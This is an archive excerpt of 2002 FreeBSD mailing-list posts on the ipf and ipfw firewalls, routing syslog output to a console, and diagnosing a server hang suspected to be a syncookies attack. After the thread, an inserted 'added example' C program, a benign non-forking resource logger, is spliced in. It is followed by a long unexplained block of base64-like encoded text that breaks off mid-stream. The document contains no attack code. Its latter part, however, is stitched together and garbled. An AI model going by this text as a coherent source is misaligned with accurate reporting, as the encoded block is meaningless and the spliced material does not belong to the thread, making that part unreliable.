Subject: Re: ipf vs. ipfw
Date: Wed, 8 May 2002 02:19:48 +0200

Also, ipfw is the interface to FreeBSD's very cool dummynet(4) traffic
shaper. I haven't used ipf personally. Does it have builtin support for
traffic shaping? Weighted Fair Queueing?

Regards,
Aragon

----- Original Message -----
From: "Baldur Gislason"
To: "Tom Limoncelli"
Cc: ;
Sent: Wednesday, May 08, 2002 1:15 AM
Subject: Re: ipf vs. ipfw

> ipfw is in no way related to the linux firewalls (ipfwadm, ipchains or
> iptables). It is a specially designed firewall for FreeBSD. It isn't
> dependent on ipf, it has its own in-kernel mechanism. It has a totally
> different syntax. Why FreeBSD has both I can't answer, ipfw and ipf each have
> their own advantages over each other. In my experience, ipfw is easier to
> work with, but it's also limited in some ways. Ipf tends to have a more
> complex ruleset, and more stateful functionality (ipfw can do stateful
> filtering but ipf has more customisable state keeping rules IIRC), however
> ipfw does have the ability to apply rules by uid's if you're doing a firewall
> for the local machine, and it does have a packet/byte counter for each
> individual rule. I'm not sure how this is with ipf as I haven't used it as
> much as I have used ipfw.
>
> Baldur
>
> On Tuesday 07 May 2002 22:30, you wrote:
> > I use ipf, and recently some people have asked me about ipfw that I
> > couldn't answer. Hopefully people on this list can enlighten me.
> >
> > Are ipf and ipfw different interfaces to the same in-kernel filtering
> > mechanism? It doesn't look like it is, but I'd like that confirmed.
> >
> > Is ipfw related at all to the Linux ipfw? The syntax looks the same,
> > but the man page doesn't mention Linux.
> >
> > Why does FreeBSD have both? Is it because ipf is generic (ported to
> > Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for
> > FreeBSD?
> >
> > Thanks in advance!
> > --tal
> >
> > P.S. I'm collecting data here:
> > http://whatexit.org/tal/mywritings/freefilters.html

From owner-freebsd-security Tue May 7 17:50:29 2002
Date: Wed, 8 May 2002 02:50:26 +0200
From: "Karsten W. Rohrbach"
To: Martin McCormick
Cc: freebsd-security@FreeBSD.ORG
Subject: Logging to console, Was: I am My Own Worst Enemy Regarding Denial of Service!
Message-ID: <20020508025026.C41899@mail.webmonster.de>
References: <200205071408.g47E8Vl29936@dc.cis.okstate.edu>
In-Reply-To: <200205071408.g47E8Vl29936@dc.cis.okstate.edu>; from martin@dc.cis.okstate.edu on Tue, May 07, 2002 at 09:08:31AM -0500

Martin McCormick(martin@dc.cis.okstate.edu)@2002.05.07 09:08:31 +0000:
> I set up our syslog.conf on a FreeBSD system to notify
> all of us when the network equipment we monitor sends a critical
> syslog message. This works perfectly and we get the messages on
> all logged-in TTY's.
>
> The system breaks down if one of our pieces of gear goes
> in to a failure mode in which it sends a continuous or more or
> less continuous stream of messages to everybody with such
> frequency that the window or screen is quickly filled.
>
> Is there any way to define a login in such a way as to
> escape the bombardment?

you define a login name as target. a user with a different login name
won't get these messages. the standard /etc/syslog.conf is set up to show
"*.err" to user "root" but not to other folks logged in. selecting some
kind of threshold, max. messages per time unit, is not possible, tells me
the source of my RELENG_4 box.
> The idea is to define one terminal with no messages
> in order to be able to work without interruption on the system in
> question.

add
    "*.* /dev/ttyvb"
to the beginning of /etc/syslog.conf
    kill -HUP syslogd
terminal 12 will have the syslog

you could also turn off ttyv0's getty in /etc/ttys:
    ttyv0 "/usr/libexec/getty Pc" cons25 off
and add let syslogd log onto this one. don't forget to "kill -1 1" after
modifying /etc/ttys

another idea is having less in follow mode run as a getty on some terminal:
    ttyvb "/usr/bin/less +F /var/log/messages" cons25 on
and log to the messages file. this one's a pretty handy one, since you can
press ^C, scroll back and forth the whole file, and follow the log again
with "F"

one might argue about if choosing ttyv0 for logs is a sensible choice. my
favourites are 11/12 (ttyv[ab]), because they're unused by default.

regards,
/k

--
> Nuclear war can ruin your whole compile. --Karl Lehenbauer
WebMonster Community Project -- Next Generation Networks GmbH -- All on BSD
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
GnuPG: 0xDEC948A6 D/E BF11 83E8 84A1 F996 68B4 A113 B393 6BF4 DEC9 48A6
REVOKED: 0x2964BF46 D/E 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
REVOKED: 0x4C44DA59 RSA F9 A0 DF 91 74 07 6A 1C 5F 0B E0 6B 4D CD 8C 44
My mail is GnuPG signed -- Unsigned ones are bogus -- http://www.gnupg.org/
Please do not remove my address from To: and Cc: fields in mailing lists. 10x

From owner-freebsd-security Tue May 7 18:16:35 2002
Date: Tue, 7 May 2002 18:13:18 -0700 (PDT)
From: Patrick Thomas
To:
Subject: what does a syncookies attack look like ?
Message-ID: <20020507180602.T8475-100000@utility.clubscholarship.com>

I have a server that is under attack, and crashes as a result of those
attacks. However, we are not sure if this is just a standard traffic
attack, or if something more elegant such as the syncookies vulnerability
is being exploited.

Therefore, I am wondering if someone can:

a) describe what a system that has been attacked in this manner looks like

b) describe (if possible) a way to look for this attack in tcpdump output

---

My system has the following behavior when it crashes: you can still ping
the server, and you can still open connections on ports where services are
running.
However, no responses are given on those ports - for instance, if you ssh,
and use the verbose option, you will see that the connection is
established, but nothing more. Same is true for telnetting to IMAP or POP
ports, etc. Cron jobs do not run after it has crashed. But again, you can
ping it just fine.

I was told on -hackers that this sounds like a system whose kernel is still
running, but the userland has halted.

I am always running tcpdump -v logging into a file when it crashes, so as
to see if something over the network is causing it - but I do not know what
to look for.

---

So, does this sound like system behavior to expect from a system that got
attacked using a syncookies exploit, or does a syncookies exploited system
behave differently ? (reset itself, or lock hard without being able to be
pinged, etc.)

Also, what can I look for on the system and on my firewall in the results
of my `tcpdump -v >> /logfile` to confirm or deny that this is the case ?

thanks,

PT

From owner-freebsd-security Tue May 7 19:35:38 2002
Date: Tue, 7 May 2002 19:35:03 -0700 (PDT)
From: Jason Stone
To: Patrick Thomas
Cc:
Subject: Re: what does a syncookies attack look like ?
In-Reply-To: <20020507180602.T8475-100000@utility.clubscholarship.com>
Message-ID: <20020507192651.T6630-100000@walter>

> My system has the following behavior when it crashes: you can still
> ping the server, and you can still open connections on ports where
> services are running. However, no responses are given on those ports
> - for instance, if you ssh, and use the verbose option, you will see
> that the connection is established, but nothing more.

I used to see this behaviour quite frequently on systems that ran out of
processes or file descriptors - the daemons in question would still be
alive, but unable to fork a child to actually handle the request.

My solution was to run a system-monitoring daemon that would keep open a
log file and periodically write information about the total number of
processes, files, memory, etc in use on the system (which it would gather
without forking). After rebooting the system, I could then look at this
log to see what was going on.

You could also write a quick daemon that listened on a socket and, upon
receiving a connection, spit out the contents of the process table or
something. Again, it should not fork, and it should print meaningful error
messages if it can't open stuff in /proc, for example. Of course giving
away the contents of your process table might not be the best of ideas, and
even if you do, you should at least firewall it to known hosts.

What evidence do you have that you're being attacked? Is it possible that
something on the system has just been misconfigured or something and is
eating up all your resources?

 -Jason

 -----------------------------------------------------------------------
 I worry about my child and the Internet all the time, even though she's
 too young to have logged on yet. Here's what I worry about. I worry that
 10 or 15 years from now, she will come to me and say "Daddy, where were
 you when they took freedom of the press away from the Internet?"
	-- Mike Godwin
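
An added example (not part of the thread, and not Jason Stone's own daemon): a minimal non-forking resource logger of the kind his reply describes, narrowed to the system-wide file table and free memory pages. It assumes FreeBSD's kern.openfiles, kern.maxfiles and vm.stats.vm.v_free_count sysctls; the log path, sampling interval, 90% threshold and all function names are hypothetical.

```c
/* Added example, not code from the thread: non-forking resource logger. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#if defined(__FreeBSD__)
#include <sys/types.h>
#include <sys/sysctl.h>
#endif

#define LOG_PATH     "/var/log/resmon.log" /* hypothetical path */
#define INTERVAL_SEC 30                    /* assumed sampling interval */
#define WARN_PCT     90                    /* assumed warning threshold */

struct sample {
    long openfiles;  /* kern.openfiles: descriptors open system-wide */
    long maxfiles;   /* kern.maxfiles: size of the system file table */
    long free_pages; /* vm.stats.vm.v_free_count */
    int err;         /* errno of the first failed read, 0 if none */
};

/* Read one 32-bit integer sysctl inside this process: no fork(), no exec(). */
static int read_counter(const char *name, long *out)
{
#if defined(__FreeBSD__)
    unsigned int v = 0;
    size_t len = sizeof(v);

    if (sysctlbyname(name, &v, &len, NULL, 0) == -1)
        return -1;
    *out = (long)v;
    return 0;
#else
    (void)name; (void)out;
    errno = ENOSYS; /* other systems: log the failure instead of guessing */
    return -1;
#endif
}

static void take_sample(struct sample *s)
{
    memset(s, 0, sizeof(*s));
    if (read_counter("kern.openfiles", &s->openfiles) == -1 ||
        read_counter("kern.maxfiles", &s->maxfiles) == -1 ||
        read_counter("vm.stats.vm.v_free_count", &s->free_pages) == -1)
        s->err = errno;
}

/* Non-zero when `used` has reached `pct` percent of `max`. */
static int near_limit(long used, long max, int pct)
{
    if (max <= 0 || used < 0)
        return 0;
    return (double)used * 100.0 >= (double)max * (double)pct;
}

/* Build one log line; a failed read becomes an explicit ERROR line. */
static int format_sample(char *buf, size_t size, time_t now,
                         const struct sample *s)
{
    char ts[32] = "unknown-time";
    struct tm *tm = gmtime(&now);

    if (tm != NULL)
        strftime(ts, sizeof(ts), "%Y-%m-%dT%H:%M:%SZ", tm);
    if (s->err != 0)
        return snprintf(buf, size, "%s ERROR cannot read counters: %s\n",
                        ts, strerror(s->err));
    return snprintf(buf, size, "%s openfiles=%ld/%ld free_pages=%ld%s\n",
                    ts, s->openfiles, s->maxfiles, s->free_pages,
                    near_limit(s->openfiles, s->maxfiles, WARN_PCT)
                        ? " WARN file table nearly full" : "");
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : LOG_PATH;
    /* Open the log once at startup: if the file table fills up later,
     * this descriptor already exists and logging keeps working. */
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT, 0600);
    char line[256];
    struct sample s;

    if (fd == -1) {
        fprintf(stderr, "resmon: cannot open %s: %s\n", path, strerror(errno));
        return 1;
    }
    for (;;) {
        take_sample(&s);
        format_sample(line, sizeof(line), time(NULL), &s);
        if (write(fd, line, strlen(line)) == -1)
            fprintf(stderr, "resmon: write failed: %s\n", strerror(errno));
        sleep(INTERVAL_SEC);
    }
}
```

After a hang and reboot, the last lines of the log show whether the file table was filling up before the machine stopped responding.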
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 